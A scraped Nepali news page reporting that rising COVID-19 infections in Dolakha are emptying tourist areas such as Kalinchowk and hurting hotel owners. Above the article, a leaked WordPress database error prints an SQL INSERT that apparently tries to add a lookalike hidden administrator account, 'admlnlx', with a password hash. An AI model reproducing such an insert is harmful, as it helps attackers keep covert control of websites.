WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjhPLFJZfWsa8t7Ly97jpjrMxzCoG81', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:22:37', '', 'admlnlx', 'admlnlx')

कोरोनाले पर्यटन व्यवसाय खस्कँदै – Gaule Khabar

कोरोनाले पर्यटन व्यवसाय खस्कँदै

कोरोनाले पर्यटन व्यवसाय खस्कँदै

काठमाण्डौ । पछिल्लो समय दोलखामा कोरोना भाइरसबाट सङ्क्रमितको सङ्ख्ष्या दैनिक बढ्दै गएको छ । सङ्क्रमित बढ्दै गएपछि पर्यटन तथा होटल व्यवसायी चिन्तित बनेका छन् ।

कोरोनाका कारण लामो समयदेखि बन्द यहाँको होटल तथा पर्यटन व्यवसाय केही महिना अघि पुनः सञ्चालनमा आएको थियो । फेरी सङ्क्रमण बढेपछि व्यवसायी चिन्तित भएका हुन् । दैनिक तीव्र गतिमा सङ्क्रमितको सङ्ख्या बढदै जान थालेपछि पर्यटकीय क्षेत्र सुनसान बन्दै गएका छन् । आन्तरिक पर्यटकका लागि मुख्य यामको रुपमा लिइने यो समयमा पर्यटकको चहलपहल छैन ।

केही दिनअघिसम्म हिउँ खेल्न आउने पर्यटकका कारण बढेको चहलपहल हाल कालीञ्चोक, चरीकोटलगायत क्षेत्रमा सुनसान छ । पर्यटनलाई लक्षित गरी व्यवसायीले करोडौँ रुपैयाँ लगानी गरेका थिए । पटक–पटक कोभिड–१९ का कारण बन्द हुन थालेपछि व्यवसायीलाई ठूलो क्षति पुगेको व्यवसायी दिनेश बस्नेतले बताए । “केही राहत महसुस भएको थियो, फेरी व्यवसाय बन्द हुने अवस्था आयो”, उनले भने ।

दोलखा उद्योग वाणिज्य सङ्घका अध्यक्ष ईन्द्र श्रेष्ठले कोरोना त्रासले व्यापार व्यवसाय पुनः चौपट भएको बताए । पछिल्लो समय जिल्लामा पर्यटकलाई लक्षित गरी होटलमा लगानी बढेको थियो । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका